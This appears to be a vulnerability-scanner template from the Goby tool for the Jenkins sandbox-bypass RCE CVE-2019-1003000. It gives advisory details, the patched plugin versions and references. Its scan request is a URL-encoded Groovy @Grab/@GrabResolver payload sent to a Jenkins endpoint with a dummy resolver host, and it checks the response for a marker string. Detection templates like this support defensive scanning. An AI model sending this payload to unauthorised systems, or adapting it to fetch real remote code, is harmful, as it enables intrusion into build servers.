mirror of https://github.com/qwqdanchun/Goby.git
{
"Name": "Jenkins Script Security and Pipeline RCE(CVE-2019-1003000)",
"Description": "A sandbox bypass vulnerability exists in Script Security Plugin 1.49 and earlier in src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java that allows attackers with the ability to provide sandboxed scripts to execute arbitrary code on the Jenkins master JVM.",
"Product": "Jenkins",
"Homepage": "https://jenkins.io/",
"DisclosureDate": "2019-01-28",
"Author": "LubyRuffy",
"FofaQuery": "app=\"Jenkins\"",
"GobyQuery": "",
"Level": "3",
"Impact": "This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master.",
"Recommendation": "- Pipeline: Declarative Plugin should be updated to version 1.3.4.1\n- Pipeline: Groovy Plugin should be updated to version 2.61.1\n- Script Security Plugin should be updated to version 1.50",
"References": [
"http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html",
"https://github.com/orangetw/awesome-jenkins-rce-2019",
"https://nvd.nist.gov/vuln/detail/CVE-2019-1003000",
"https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266",
"http://packetstormsecurity.com/files/152132/Jenkins-ACL-Bypass-Metaprogramming-Remote-Code-Execution.html",
"http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming",
"https://access.redhat.com/errata/RHBA-2019:0326",
"https://access.redhat.com/errata/RHBA-2019:0327",
"https://www.exploit-db.com/exploits/46453/",
"https://www.exploit-db.com/exploits/46572/",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1003000"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"header": {},
"method": "GET",
"uri": "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://nevercouldexists%27)%0a@Grab(group=%27package%27,%20module=%27onlyforgobytest%27,%20version=%271%27)%0aimport%20Payload;"
},
"ResponseTest": {
"checks": [
{
"operation": "contains",
"type": "item",
"value": "package#onlyforgobytest",
"variable": "$body"
}
],
"operation": "AND",
"type": "group"
}
}
],
"Tags": [
"rce"
],
"CVEIDs": [
"CVE-2019-1003000"
],
"CVSSScore": "8.8"
} |